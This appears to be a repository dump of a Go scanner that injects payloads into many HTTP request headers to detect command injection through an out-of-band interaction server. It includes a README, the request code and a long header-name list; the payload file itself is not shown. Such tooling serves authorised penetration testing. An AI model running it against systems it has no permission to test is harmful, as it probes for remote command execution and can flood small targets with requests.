├── README.md
├── core
│   └── core.go
├── go.mod
├── headers_all.txt
├── headers_common.txt
├── image
│   ├── insprired.png
│   └── run.png
├── main.go
├── payloads.txt
└── urls.txt
/README.md:
--------------------------------------------------------------------------------
1 | ## cmd-inject-header
2 | A simple tool to check for command injection in the headers of an HTTP request, made faster with goroutines
3 | 
4 | Designed to make it easy for bug hunters, pentesters and red teamers to check request headers for command injection
5 | 
6 | ### Inspired by
7 | https://twitter.com/p3n73st3r/status/1556645395928866818
8 | 
9 | ![https://raw.githubusercontent.com/tranquac/cmd-inject-header/master/image/insprired.png](https://raw.githubusercontent.com/tranquac/cmd-inject-header/master/image/insprired.png)
10 | ### Usage
11 | ```
12 | Usage of cmd-inject-header:
13 |   -hd string
14 |         Path to list header file
15 |   -it string
16 |         Your interact server to check the interaction (dnslog.cn/burp collabarator/interact.sh...)
17 |   -pl string
18 |         Path to list payload file
19 |   -se
20 |         If you want send request for status code 4xx/5xx
21 |   -ur string
22 |         Path to list url file (URL have / in the end: http://example.com/)
23 | ```
24 | Usage : `go run . -hd headers_common.txt -pl payloads.txt -ur urls.txt -it xxx.burpcollaborator.net`
25 | 
26 | Usage : `go run . -hd headers_common.txt -pl payloads.txt -ur urls.txt -it xxx.burpcollaborator.net -se=true`
27 | 
28 | (To send requests that get a 4xx/5xx status code. Sometimes an app is only vulnerable on that error path!)
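// File: core/core.go

// Package core sends HTTP GET requests that each carry one header/payload
// pair, fanning out over every (header, payload) combination for a URL, and
// reports the status code (or the transport error) of each probe on a channel.
//
// go.mod declares `module cmd-inject-header` with `go 1.17`, so this file
// stays clear of newer language and library features (generics, any, slices).
package core

import (
	"bufio"
	"crypto/tls"
	"fmt"
	"io"
	"log"
	"net"
	"net/http"
	"os"
	"time"
)

// defaultUserAgent is sent on every probe whose injected header is not itself
// User-Agent, so the probe looks like an ordinary browser request.
const defaultUserAgent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36"

// transport is shared by every probe so keep-alive connections are reused.
//
// SECURITY: InsecureSkipVerify disables TLS certificate validation. That is a
// deliberate choice for a testing tool aimed at lab/self-signed targets, but
// it also means the probes (including the interact-server hostname embedded
// in each payload) can be read or altered by anyone on the network path.
var transport = &http.Transport{
	TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
	DialContext: (&net.Dialer{
		Timeout:   30 * time.Second,
		KeepAlive: time.Second,
		// The original also set DualStack: true; that field is deprecated and
		// a no-op since Go 1.12 (dual-stack fallback is always on), so
		// dropping it changes nothing.
	}).DialContext,
}

// httpClient performs all probes. Only the dial is bounded (30s above); there
// is no overall Client.Timeout, so a target that accepts the connection and
// then never answers can hold a probe goroutine indefinitely.
var httpClient = &http.Client{
	Transport: transport,
}

// ReadFromFile returns the lines of filename in order, one string per line
// with the newline stripped. Blank lines are kept, so they count as entries
// when the caller multiplies list lengths together.
//
// Like the rest of the CLI it treats an unreadable file as fatal and exits
// the process via log.Fatalf instead of returning an error. bufio.Scanner's
// default token limit applies, so a line longer than 64 KiB is also fatal.
func ReadFromFile(filename string) []string {
	f, err := os.Open(filename)
	if err != nil {
		// Report the path and the OS error; the original message dropped both.
		log.Fatalf("File could not be read: %s: %v", filename, err)
	}
	defer f.Close()

	var lines []string
	sc := bufio.NewScanner(f)
	for sc.Scan() {
		lines = append(lines, sc.Text())
	}
	if err := sc.Err(); err != nil {
		log.Fatalf("reading %s: %v", filename, err)
	}
	return lines
}

// MakeRequestHeader probes url with every header in headers (each header in
// turn tries every payload, see MakeRequestPayload), prints each header's
// completion line as it arrives, and finally sends exactly one
// "Done Url <url>" line on ch.
//
// There is no concurrency limit: every header starts its own goroutine and
// each of those starts one goroutine per payload, so up to
// len(headers)*len(payloads) requests to a single target can be in flight at
// once. With headers_all.txt that is over a thousand simultaneous requests,
// enough to disrupt a small target; prefer headers_common.txt or add a bound
// before pointing the tool at systems you do not own.
func MakeRequestHeader(url string, headers, payloads []string, ch chan<- string) {
	perHeader := make(chan string)
	for _, h := range headers {
		go MakeRequestPayload(url, h, payloads, perHeader)
	}
	// Fan-in: exactly one line is expected per header.
	for range headers {
		fmt.Println(<-perHeader)
	}
	ch <- fmt.Sprintf("Done Url %s", url)
}

// MakeRequestPayload sends one request per payload for the given header,
// prints each probe's result line as it arrives, and finally sends exactly
// one "Done Header <header>" line on ch.
func MakeRequestPayload(url, header string, payloads []string, ch chan<- string) {
	perPayload := make(chan string)
	for _, p := range payloads {
		go MakeRequestFinal(url, header, p, perPayload)
	}
	// Fan-in: exactly one line is expected per payload.
	for range payloads {
		fmt.Println(<-perPayload)
	}
	ch <- fmt.Sprintf("Done Header %s", header)
}

// MakeRequestFinal sends one GET to url carrying "header: payload" and writes
// exactly one line to ch: either the elapsed seconds, status code, header and
// payload, or the error that prevented the request.
//
// The one-send-per-call contract is what the fan-in loops above rely on; a
// missing send would block the collecting goroutine forever.
func MakeRequestFinal(url, header, payload string, ch chan<- string) {
	start := time.Now()

	req, err := http.NewRequest(http.MethodGet, url, nil)
	if err != nil {
		// The original only printed this error and then fell through to
		// req.Header.Add on a nil request (panic) without ever sending on
		// ch, which deadlocked the caller.
		ch <- fmt.Sprintf("%v", err)
		return
	}

	// Compare canonical names so that e.g. "user-agent" in the header list
	// does not end up as a second User-Agent line next to the default one.
	if http.CanonicalHeaderKey(header) != "User-Agent" {
		req.Header.Add("User-Agent", defaultUserAgent)
	}
	// NOTE: net/http manages Host, Content-Length, Transfer-Encoding and
	// Trailer itself and does not emit values set for them in req.Header, so
	// probes for those names from headers_all.txt do not reach the target as
	// written here.
	req.Header.Add(header, payload)

	resp, err := httpClient.Do(req)
	if err != nil {
		ch <- fmt.Sprintf("%v", err)
		return
	}
	// Measure before draining so "elapsed" keeps its original meaning
	// (time to response headers).
	secs := time.Since(start).Seconds()

	// Drain (bounded, so a huge body cannot stall the probe) and close the
	// body so the keep-alive connection can be reused and no descriptor
	// leaks; the original never closed it.
	_, _ = io.Copy(io.Discard, io.LimitReader(resp.Body, 1<<20))
	_ = resp.Body.Close()

	ch <- fmt.Sprintf("%.2f elapsed for URL: %s | StatusCode: %d | Header: %s | Payload: %s", secs, url, resp.StatusCode, header, payload)
}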
Bad-Request 52 | Bae-Env-Addr-Bcms 53 | Bae-Env-Addr-Bcs 54 | Bae-Env-Addr-Bus 55 | Bae-Env-Addr-Channel 56 | Bae-Env-Addr-Sql-Ip 57 | Bae-Env-Addr-Sql-Port 58 | Bae-Env-Ak 59 | Bae-Env-Appid 60 | Bae-Env-Sk 61 | Bae-Logid 62 | Bar 63 | Base 64 | Base-Url 65 | Basic 66 | Bearer-Indication 67 | Body-Maxlength 68 | Body-Truncated 69 | Brief 70 | Browser-User-Agent 71 | Cache-Control 72 | Cache-Info 73 | Case-Files 74 | Catalog 75 | Catalog-Server 76 | Category 77 | Cert-Cookie 78 | Cert-Flags 79 | Cert-Issuer 80 | Cert-Keysize 81 | Cert-Secretkeysize 82 | Cert-Serialnumber 83 | Cert-Server-Issuer 84 | Cert-Server-Subject 85 | Cert-Subject 86 | Cf-Connecting-Ip 87 | Cf-Ipcountry 88 | Cf-Template-Path 89 | Cf-Visitor 90 | Ch 91 | Challenge-Response 92 | Charset 93 | Chunk-Size 94 | Client 95 | Client-Address 96 | Client-Bad-Request 97 | Client-Conflict 98 | Client-Error-Cannot-Access-Local-File 99 | Client-Error-Cannot-Connect 100 | Client-Error-Communication-Failure 101 | Client-Error-Connect 102 | Client-Error-Invalid-Parameters 103 | Client-Error-Invalid-Server-Address 104 | Client-Error-No-Error 105 | Client-Error-Protocol-Failure 106 | Client-Error-Unspecified-Error 107 | Client-Expectation-Failed 108 | Client-Forbidden 109 | Client-Gone 110 | Client-Ip 111 | Client-IP 112 | Client-Length-Required 113 | Client-Method-Not-Allowed 114 | Client-Not-Acceptable 115 | Client-Not-Found 116 | Client-Payment-Required 117 | Client-Precondition-Failed 118 | Client-Proxy-Auth-Required 119 | Client-Quirk-Mode 120 | Client-Request-Timeout 121 | Client-Request-Too-Large 122 | Client-Request-Uri-Too-Large 123 | Client-Requested-Range-Not-Possible 124 | Client-Unauthorized 125 | Client-Unsupported-Media-Type 126 | Clientaddress 127 | Clientip 128 | Cloudfront-Viewer-Country 129 | Cloudinary-Name 130 | Cloudinary-Public-Id 131 | Cloudinary-Version 132 | Cloudinaryurl 133 | Cluster-Client-IP 134 | Code 135 | Coming-From 136 | Compress 137 | Conflict 138 | Connection 139 | 
Connection-Type 140 | Contact 141 | Content 142 | Content-Disposition 143 | Content-Encoding 144 | Content-Language 145 | Content-Length 146 | Content-Location 147 | Content-MD5 148 | Content-Md5 149 | Content-Range 150 | Content-Security-Policy 151 | Content-Security-Policy-Report-Only 152 | Content-Type 153 | Content-Type-Xhtml 154 | Context-Path 155 | Continue 156 | Cookie 157 | Cookie-Domain 158 | Cookie-Httponly 159 | Cookie-Parse-Raw 160 | Cookie-Path 161 | Cookie-Secure 162 | Cookie-Vars 163 | Cookie2 164 | Cookies 165 | Core-Base 166 | Correlates 167 | Created 168 | Credentials-Filepath 169 | Cross-Origin-Embedder-Policy 170 | Cross-Origin-Opener-Policy 171 | Cross-Origin-Resource-Policy 172 | Curl 173 | Curl-Multithreaded 174 | Custom-Header 175 | Custom-Secret-Header 176 | Dataserviceversion 177 | Date 178 | Debug 179 | Deflate-Level-Def 180 | Deflate-Level-Max 181 | Deflate-Level-Min 182 | Deflate-Strategy-Def 183 | Deflate-Strategy-Filt 184 | Deflate-Strategy-Fixed 185 | Deflate-Strategy-Huff 186 | Deflate-Strategy-Rle 187 | Deflate-Type-Gzip 188 | Deflate-Type-Raw 189 | Deflate-Type-Zlib 190 | Delete 191 | Depth 192 | Destination 193 | Destroy 194 | Devblocksproxybase 195 | Devblocksproxyhost 196 | Devblocksproxyssl 197 | Device-Stock-Ua 198 | Digest 199 | Dir 200 | Dir-Name 201 | Dir-Resource 202 | Disable-Gzip 203 | Dkim-Signature 204 | DNT 205 | Dnt 206 | Download-Attachment 207 | Download-Bad-Url 208 | Download-Bz2 209 | Download-Cut-Short 210 | Download-E-Headers-Sent 211 | Download-E-Invalid-Archive-Type 212 | Download-E-Invalid-Content-Type 213 | Download-E-Invalid-File 214 | Download-E-Invalid-Param 215 | Download-E-Invalid-Request 216 | Download-E-Invalid-Resource 217 | Download-E-No-Ext-Mmagic 218 | Download-E-No-Ext-Zlib 219 | Download-Inline 220 | Download-Mime-Type 221 | Download-No-Server 222 | Download-Size 223 | Download-Status-Not-Found 224 | Download-Status-Server-Error 225 | Download-Status-Unauthorized 226 | Download-Status-Unknown 
227 | Download-Tar 228 | Download-Tgz 229 | Download-Url 230 | Download-Zip 231 | E-Encoding 232 | E-Header 233 | E-Invalid-Param 234 | E-Malformed-Headers 235 | E-Message-Type 236 | E-Querystring 237 | E-Request 238 | E-Request-Method 239 | E-Request-Pool 240 | E-Response 241 | E-Runtime 242 | E-Socket 243 | E-Url 244 | Enable-Gzip 245 | Enable-No-Cache-Headers 246 | Encoding-Stream-Flush-Full 247 | Encoding-Stream-Flush-None 248 | Encoding-Stream-Flush-Sync 249 | Env-Silla-Environment 250 | Env-Vars 251 | Error 252 | Error-1 253 | Error-2 254 | Error-3 255 | Error-4 256 | Error-Formatting-Html 257 | Espo-Authorization 258 | Espo-Cgi-Auth 259 | Etag 260 | Eve-Charid 261 | Eve-Charname 262 | Eve-Solarsystemid 263 | Eve-Solarsystemname 264 | Eve-Trusted 265 | Ex-Copy-Movie 266 | Expect 267 | Expect-CT 268 | Expectation-Failed 269 | Expires 270 | Ext 271 | Failed-Dependency 272 | Fake-Header 273 | Fastly-Client-Ip 274 | Fb-Appid 275 | Fb-Secret 276 | Feature-Policy 277 | File-Not-Found 278 | Filename 279 | Files 280 | Files-Vars 281 | Fire-Breathing-Dragon 282 | Foo 283 | Foo-Bar 284 | Forbidden 285 | Force-Language 286 | Force-Local-Xhprof 287 | Format 288 | Forwarded 289 | Forwarded-For 290 | Forwarded-For-Ip 291 | Forwarded-Proto 292 | From 293 | Fromlink 294 | Front-End-Https 295 | Gateway-Interface 296 | Gateway-Time-Out 297 | Get 298 | Get-Vars 299 | Givenname 300 | Global-All 301 | Global-Cookie 302 | Global-Get 303 | Global-Post 304 | Gone 305 | Google-Code-Project-Hosting-Hook-Hmac 306 | Gzip-Level 307 | H0st 308 | Head 309 | Header 310 | Header-Lf 311 | Header-Status-Client-Error 312 | Header-Status-Informational 313 | Header-Status-Redirect 314 | Header-Status-Server-Error 315 | Header-Status-Successful 316 | Home 317 | Host 318 | Host-Liveserver 319 | Host-Name 320 | Host-Unavailable 321 | Hosti 322 | Htaccess 323 | Http-Accept 324 | Http-Accept-Encoding 325 | Http-Accept-Language 326 | Http-Authorization 327 | Http-Connection 328 | Http-Cookie 329 | 
Http-Host 330 | Http-Phone-Number 331 | Http-Referer 332 | Http-Url 333 | Http-User-Agent 334 | HTTP2-Settings 335 | Https 336 | Https-From-Lb 337 | Https-Keysize 338 | Https-Secretkeysize 339 | Https-Server-Issuer 340 | Https-Server-Subject 341 | If 342 | If-Match 343 | If-Modified-Since 344 | If-Modified-Since-Version 345 | If-None-Match 346 | If-Posted-Before 347 | If-Range 348 | If-Unmodified-Since 349 | If-Unmodified-Since-Version 350 | Image 351 | Images 352 | Incap-Client-Ip 353 | Info 354 | Info-Download-Size 355 | Info-Download-Time 356 | Info-Return-Code 357 | Info-Total-Request-Stat 358 | Info-Total-Response-Stat 359 | Insufficient-Storage 360 | Internal-Server-Error 361 | Ipresolve-Any 362 | Ipresolve-V4 363 | Ipresolve-V6 364 | Ischedule-Version 365 | Iv-Groups 366 | Iv-User 367 | Javascript 368 | Jenkins 369 | Keep-Alive 370 | Kiss-Rpc 371 | Label 372 | Large-Allocation 373 | Last-Event-Id 374 | Last-Modified 375 | Length-Required 376 | Link 377 | Local-Addr 378 | Local-Content-Sha1 379 | Local-Dir 380 | Location 381 | Lock-Token 382 | Locked 383 | Mail 384 | Mandatory 385 | Max-Conn 386 | Max-Forwards 387 | Max-Request-Size 388 | Max-Uri-Length 389 | Maxdataserviceversion 390 | Message 391 | Message-B 392 | Meth- 393 | Meth-Acl 394 | Meth-Baseline-Control 395 | Meth-Checkin 396 | Meth-Checkout 397 | Meth-Connect 398 | Meth-Copy 399 | Meth-Delete 400 | Meth-Get 401 | Meth-Head 402 | Meth-Label 403 | Meth-Lock 404 | Meth-Merge 405 | Meth-Mkactivity 406 | Meth-Mkcol 407 | Meth-Mkworkspace 408 | Meth-Move 409 | Meth-Options 410 | Meth-Post 411 | Meth-Propfind 412 | Meth-Proppatch 413 | Meth-Put 414 | Meth-Report 415 | Meth-Trace 416 | Meth-Uncheckout 417 | Meth-Unlock 418 | Meth-Update 419 | Meth-Version-Control 420 | Method 421 | Method-Not-Allowed 422 | Mimetype 423 | Mod-Env 424 | Mod-Rewrite 425 | Mod-Security-Message 426 | Modauth 427 | Mode 428 | Module-Class 429 | Module-Class-Path 430 | Module-Name 431 | Moved-Permanently 432 | Moved-Temporarily 
433 | Ms-Asprotocolversion 434 | Msg-None 435 | Msg-Request 436 | Msg-Response 437 | Msisdn 438 | Multi-Status 439 | Multipart-Boundary 440 | Multiple-Choices 441 | Must 442 | My-Header 443 | Mysqlport 444 | Native-Sockets 445 | Negotiate 446 | Nl 447 | No-Content 448 | Non-Authoritative 449 | Nonce 450 | Not-Acceptable 451 | Not-Exists 452 | Not-Extended 453 | Not-Found 454 | Not-Implemented 455 | Not-Modified 456 | Notification-Template 457 | Oc-Chunked 458 | Ocs-Apirequest 459 | Ok 460 | On-Behalf-Of 461 | Onerror-Continue 462 | Onerror-Die 463 | Onerror-Return 464 | Only 465 | Opencart 466 | Options 467 | Organizer 468 | Orig_path_info 469 | Origin 470 | Origin-Isolation 471 | Originator 472 | Overwrite 473 | Params-Allow-Comma 474 | Params-Allow-Failure 475 | Params-Default 476 | Params-Get-Catid 477 | Params-Get-Currentday 478 | Params-Get-Disposition 479 | Params-Get-Downwards 480 | Params-Get-Givendate 481 | Params-Get-Lang 482 | Params-Get-Type 483 | Params-Raise-Error 484 | Partial-Content 485 | Passkey 486 | Password 487 | Path 488 | Path-Base 489 | Path-Info 490 | Path-Themes 491 | Path-Translated 492 | Payment-Required 493 | Pc-Remote-Addr 494 | Permanent 495 | Phone-Number 496 | Php 497 | Php-Auth-Pw 498 | Php-Auth-User 499 | Phpthreads 500 | Pink-Pony 501 | Port 502 | Portsensor-Auth 503 | Post 504 | Post-Error 505 | Post-Files 506 | Post-Vars 507 | Postredir-301 508 | Postredir-302 509 | Postredir-All 510 | Pragma 511 | Pragma-No-Cache 512 | Precondition-Failed 513 | Prefer 514 | Processing 515 | Profile 516 | Protocol 517 | Protocols 518 | Proxy 519 | Proxy-Agent 520 | Proxy-Authenticate 521 | Proxy-Authentication-Required 522 | Proxy-Authorization 523 | Proxy-Connection 524 | Proxy-Host 525 | Proxy-Http 526 | Proxy-Http-1-0 527 | Proxy-Password 528 | Proxy-Port 529 | Proxy-Pwd 530 | Proxy-Request-Fulluri 531 | Proxy-Socks4 532 | Proxy-Socks4a 533 | Proxy-Socks5 534 | Proxy-Socks5-Hostname 535 | Proxy-Url 536 | Proxy-User 537 | Public-Key-Pins 538 
| Public-Key-Pins-Report-Only 539 | Pull 540 | Put 541 | Query-String 542 | Querystring 543 | Querystring-Type-Array 544 | Querystring-Type-Bool 545 | Querystring-Type-Float 546 | Querystring-Type-Int 547 | Querystring-Type-Object 548 | Querystring-Type-String 549 | Range 550 | Range-Not-Satisfiable 551 | Raw-Post-Data 552 | Read-State-Begin 553 | Read-State-Body 554 | Read-State-Headers 555 | Real-Ip 556 | Real-Method 557 | Reason 558 | Reason-Phrase 559 | Recipient 560 | Redirect 561 | Redirect-Found 562 | Redirect-Perm 563 | Redirect-Post 564 | Redirect-Problem-Withoutwww 565 | Redirect-Problem-Withwww 566 | Redirect-Proxy 567 | Redirect-Temp 568 | Redirected-Accept-Language 569 | Redirection-Found 570 | Redirection-Multiple-Choices 571 | Redirection-Not-Modified 572 | Redirection-Permanent 573 | Redirection-See-Other 574 | Redirection-Temporary 575 | Redirection-Unused 576 | Redirection-Use-Proxy 577 | Ref 578 | Referer 579 | Referrer 580 | Referrer-Policy 581 | Refferer 582 | Refresh 583 | Remix-Hash 584 | Remote-Addr 585 | Remote-Host 586 | Remote-Host-Wp 587 | Remote-User 588 | Remote-Userhttps 589 | Report-To 590 | Request 591 | Request-Entity-Too-Large 592 | Request-Error 593 | Request-Error-File 594 | Request-Error-Gzip-Crc 595 | Request-Error-Gzip-Data 596 | Request-Error-Gzip-Method 597 | Request-Error-Gzip-Read 598 | Request-Error-Proxy 599 | Request-Error-Redirects 600 | Request-Error-Response 601 | Request-Error-Url 602 | Request-Http-Ver-1-0 603 | Request-Http-Ver-1-1 604 | Request-Mbstring 605 | Request-Method 606 | Request-Method- 607 | Request-Method-Delete 608 | Request-Method-Get 609 | Request-Method-Head 610 | Request-Method-Options 611 | Request-Method-Post 612 | Request-Method-Put 613 | Request-Method-Trace 614 | Request-Time-Out 615 | Request-Timeout 616 | Request-Uri 617 | Request-Uri-Too-Large 618 | Request-Vars 619 | Request2-Tests-Base-Url 620 | Request2-Tests-Proxy-Host 621 | Requesttoken 622 | Reset-Content 623 | Response 624 | 
Rest-Key 625 | Rest-Sign 626 | Retry-After 627 | Returned-Error 628 | Rlnclientipaddr 629 | Root 630 | Safe-Ports-List 631 | Safe-Ports-Ssl-List 632 | Save-Data 633 | Schedule-Reply 634 | Scheme 635 | Script-Name 636 | Sec-Websocket-Accept 637 | Sec-Websocket-Extensions 638 | Sec-Websocket-Key 639 | Sec-Websocket-Key1 640 | Sec-Websocket-Key2 641 | Sec-Websocket-Origin 642 | Sec-Websocket-Protocol 643 | Sec-Websocket-Version 644 | Secretkey 645 | See-Other 646 | Self 647 | Send-X-Frame-Options 648 | Server 649 | Server-Bad-Gateway 650 | Server-Error 651 | Server-Gateway-Timeout 652 | Server-Internal 653 | Server-Name 654 | Server-Not-Implemented 655 | Server-Port 656 | Server-Port-Secure 657 | Server-Protocol 658 | Server-Service-Unavailable 659 | Server-Software 660 | Server-Unsupported-Version 661 | Server-Vars 662 | Server-Varsabantecart 663 | Service-Unavailable 664 | Session-Id-Tag 665 | Session-Vars 666 | Set-Cookie 667 | Set-Cookie2 668 | Shib- 669 | Shib-Application-Id 670 | Shib-Identity-Provider 671 | Shib-Logouturl 672 | Shopilex 673 | Slug 674 | Sn 675 | Soapaction 676 | Socket-Connection-Err 677 | Socketlog 678 | Somevar 679 | Sourcemap 680 | Sp-Client 681 | Sp-Host 682 | Ssl 683 | Ssl-Https 684 | Ssl-Offloaded 685 | Ssl-Session-Id 686 | Ssl-Version-Any 687 | Sslsessionid 688 | Start 689 | Status 690 | Status- 691 | Status-403 692 | Status-403-Admin-Del 693 | Status-404 694 | Status-Bad-Request 695 | Status-Code 696 | Status-Forbidden 697 | Status-Ok 698 | Status-Platform-403 699 | Str-Match 700 | Strict-Transport-Security 701 | Success-Accepted 702 | Success-Created 703 | Success-No-Content 704 | Success-Non-Authoritative 705 | Success-Ok 706 | Success-Partial-Content 707 | Success-Reset-Content 708 | Support 709 | Support-Encodings 710 | Support-Events 711 | Support-Magicmime 712 | Support-Requests 713 | Support-Sslrequests 714 | Surrogate-Capability 715 | Switching-Protocols 716 | TE 717 | Te 718 | Temporary-Redirect 719 | Test 720 | Test-Config 721 
| Test-Server-Path 722 | Test-Something-Anything 723 | Ticket 724 | Time-Out 725 | Timeout 726 | Timing-Allow-Origin 727 | Title 728 | Tk 729 | Tmp 730 | Token 731 | Trailer 732 | Transfer-Encoding 733 | Translate 734 | Transport-Err 735 | True-Client-Ip 736 | True-Client-IP 737 | Ua 738 | Ua-Color 739 | Ua-Cpu 740 | Ua-Os 741 | Ua-Pixels 742 | Ua-Resolution 743 | Ua-Voice 744 | Unauthorized 745 | Unencoded-Url 746 | Unit-Test-Mode 747 | UniqueId 748 | Unless-Modified-Since 749 | Unprocessable-Entity 750 | Unsupported-Media-Type 751 | Upgrade 752 | Upgrade-Insecure-Requests 753 | Upgrade-Required 754 | Upload-Default-Chmod 755 | Uri 756 | Url 757 | Url-From-Env 758 | Url-Join-Path 759 | Url-Join-Query 760 | Url-Replace 761 | Url-Sanitize-Path 762 | Url-Strip- 763 | Url-Strip-All 764 | Url-Strip-Auth 765 | Url-Strip-Fragment 766 | Url-Strip-Pass 767 | Url-Strip-Path 768 | Url-Strip-Port 769 | Url-Strip-Query 770 | Url-Strip-User 771 | Use-Gzip 772 | Use-Proxy 773 | User 774 | User-Agent 775 | User-Agent-Via 776 | User-Email 777 | User-Id 778 | User-Mail 779 | User-Name 780 | User-Photos 781 | Useragent 782 | Useragent-Via 783 | Util 784 | Variant-Also-Varies 785 | Vary 786 | Verbose 787 | Verbose-Throttle 788 | Verify-Cert 789 | Version 790 | Version-1-0 791 | Version-1-1 792 | Version-Any 793 | Version-None 794 | Version-Not-Supported 795 | Versioncode 796 | Via 797 | Viad 798 | Waf-Stuff-Below 799 | Wap-Connection 800 | Warning 801 | Web-Server-Api 802 | Webodf-Member-Id 803 | Webodf-Session-Id 804 | Webodf-Session-Revision 805 | Work-Directory 806 | Www-Address 807 | Www-Authenticate 808 | X 809 | X- 810 | X-Aastra-Expmod1 811 | X-Aastra-Expmod2 812 | X-Aastra-Expmod3 813 | X-Accel-Mapping 814 | X-Access-Token 815 | X-Advertiser-Id 816 | X-Ajax-Real-Method 817 | X-Alto-Ajax-Keyz 818 | X-Amz-Date 819 | X-Amz-Website-Redirect-Location 820 | X-Amzn-Remapped-Host 821 | X-Api-Key 822 | X-Api-Signature 823 | X-Api-Timestamp 824 | X-Apitoken 825 | 
X-Apple-Client-Application 826 | X-Apple-Store-Front 827 | X-Arr-Log-Id 828 | X-Arr-Ssl 829 | X-ATT-DeviceId 830 | X-Att-Deviceid 831 | X-Auth-Key 832 | X-Auth-Mode 833 | X-Auth-Password 834 | X-Auth-Service-Provider 835 | X-Auth-Token 836 | X-Auth-User 837 | X-Auth-Userid 838 | X-Auth-Username 839 | X-Authentication 840 | X-Authentication-Key 841 | X-Authorization 842 | X-Avantgo-Screensize 843 | X-Azc-Remote-Addr 844 | X-Bear-Ajax-Request 845 | X-Bluecoat-Via 846 | X-Bolt-Phone-Ua 847 | X-Browser-Height 848 | X-Browser-Width 849 | X-Cascade 850 | X-Cept-Encoding 851 | X-Cf-Url 852 | X-Chrome-Extension 853 | X-Cisco-Bbsm-Clientip 854 | X-Client-Host 855 | X-Client-Id 856 | X-Client-Ip 857 | X-Client-IP 858 | X-Client-Key 859 | X-Client-Os 860 | X-Client-Os-Ver 861 | X-Clientip 862 | X-Cluster-Client-Ip 863 | X-Codeception-Codecoverage 864 | X-Codeception-Codecoverage-Config 865 | X-Codeception-Codecoverage-Debug 866 | X-Codeception-Codecoverage-Suite 867 | X-Collect-Coverage 868 | X-Coming-From 869 | X-Confirm-Delete 870 | X-Content-Type 871 | X-Content-Type-Options 872 | X-Correlation-ID 873 | X-Credentials-Request 874 | X-Csrf-Crumb 875 | X-Csrf-Token 876 | X-Csrftoken 877 | X-Cuid 878 | X-Custom 879 | X-Dagd-Proxy 880 | X-Davical-Testcase 881 | X-Dcmguid 882 | X-Debug-Test 883 | X-Device-User-Agent 884 | X-Download-Options 885 | X-Dialog 886 | X-Dns-Prefetch-Control 887 | X-Do-Not-Track 888 | X-Dokuwiki-Do 889 | X-Drestcg 890 | X-Dsid 891 | X-Elgg-Apikey 892 | X-Elgg-Hmac 893 | X-Elgg-Hmac-Algo 894 | X-Elgg-Nonce 895 | X-Elgg-Posthash 896 | X-Elgg-Posthash-Algo 897 | X-Elgg-Time 898 | X-Em-Uid 899 | X-Enable-Coverage 900 | X-Environment-Override 901 | X-Expected-Entity-Length 902 | X-Experience-Api-Version 903 | X-Fb-User-Remote-Addr 904 | X-File-Id 905 | X-File-Name 906 | X-File-Resume 907 | X-File-Size 908 | X-File-Type 909 | X-Filename 910 | X-Firelogger 911 | X-Fireloggerauth 912 | X-Firephp-Version 913 | X-Flash-Version 914 | X-Flx-Consumer-Key 915 | 
X-Flx-Consumer-Secret 916 | X-Flx-Redirect-Url 917 | X-Foo 918 | X-Foo-Bar 919 | X-Forward-For 920 | X-Forward-Proto 921 | X-Forwarded 922 | X-Forwarded-By 923 | X-Forwarded-For 924 | X-Forwarded-For-Original 925 | X-Forwarded-Host 926 | X-Forwarded-Port 927 | X-Forwarded-Proto 928 | X-Forwarded-Protocol 929 | X-Forwarded-Scheme 930 | X-Forwarded-Server 931 | X-Forwarded-Ssl 932 | X-Forwarder-For 933 | X-From 934 | X-Gb-Shared-Secret 935 | X-Geoip-Country 936 | X-Get-Checksum 937 | X-Helpscout-Event 938 | X-Helpscout-Signature 939 | X-Hgarg- 940 | X-Host 941 | X-Http-Destinationurl 942 | X-Http-Host-Override 943 | X-Http-Method 944 | X-Http-Method-Override 945 | X-Http-Path-Override 946 | X-Https 947 | X-Htx-Agent 948 | X-Huawei-Userid 949 | X-Hub-Signature 950 | X-If-Unmodified-Since 951 | X-Imbo-Test-Config 952 | X-Insight 953 | X-Ip 954 | X-Ip-Trail 955 | X-Iwproxy-Nesting 956 | X-Jphone-Color 957 | X-Jphone-Display 958 | X-Jphone-Geocode 959 | X-Jphone-Msname 960 | X-Jphone-Uid 961 | X-Json 962 | X-Kaltura-Remote-Addr 963 | X-Known-Signature 964 | X-Known-Username 965 | X-Litmus 966 | X-Litmus-Second 967 | X-Locking 968 | X-Machine 969 | X-Mandrill-Signature 970 | X-Method-Override 971 | X-Mobile-Gateway 972 | X-Mobile-Ua 973 | X-Mosso-Dt 974 | X-Moz 975 | X-Ms-Policykey 976 | X-Msisdn 977 | X-Myqee-System-Debug 978 | X-Myqee-System-Hash 979 | X-Myqee-System-Isadmin 980 | X-Myqee-System-Isrest 981 | X-Myqee-System-Pathinfo 982 | X-Myqee-System-Project 983 | X-Myqee-System-Rstr 984 | X-Myqee-System-Time 985 | X-Network-Info 986 | X-Nfsn-Https 987 | X-Ning-Request-Uri 988 | X-No-WWW-Authenticate 989 | X-Nokia-Bearer 990 | X-Nokia-Connection-Mode 991 | X-Nokia-Gateway-Id 992 | X-Nokia-Ipaddress 993 | X-Nokia-Msisdn 994 | X-Nokia-Wia-Accept-Original 995 | X-Nokia-Wtls 996 | X-Nuget-Apikey 997 | X-Oc-Mtime 998 | X-Opera-Info 999 | X-Operamini-Features 1000 | X-Operamini-Phone 1001 | X-Operamini-Phone-Ua 1002 | X-Options 1003 | X-Orange-Id 1004 | X-Orchestra-Scheme 
1005 | X-Orig-Client 1006 | X-Original-Host 1007 | X-Original-Http-Command 1008 | X-Original-Remote-Addr 1009 | X-Original-Url 1010 | X-Original-User-Agent 1011 | X-Originally-Forwarded-For 1012 | X-Originally-Forwarded-Proto 1013 | X-Originating-Ip 1014 | X-Originating-IP 1015 | X-Os-Prefs 1016 | X-Overlay 1017 | X-Pagelet-Fragment 1018 | X-Password 1019 | X-Permitted-Cross-Domain-Policies 1020 | X-Phabricator-Csrf 1021 | X-Phpbb-Using-Plupload 1022 | X-Pjax 1023 | X-Pjax-Container 1024 | X-Powered-By 1025 | X-Prototype-Version 1026 | X-Proxy-Url 1027 | X-Pswd 1028 | X-Purpose 1029 | X-Qafoo-Profiler 1030 | X-Real-Ip 1031 | X-Remote-Addr 1032 | X-Remote-IP 1033 | X-Remote-Protocol 1034 | X-Render-Partial 1035 | X-Request 1036 | X-Request-ID 1037 | X-Request-Id 1038 | X-Request-Signature 1039 | X-Request-Start 1040 | X-Request-Timestamp 1041 | X-Requested-With 1042 | X-Response-Format 1043 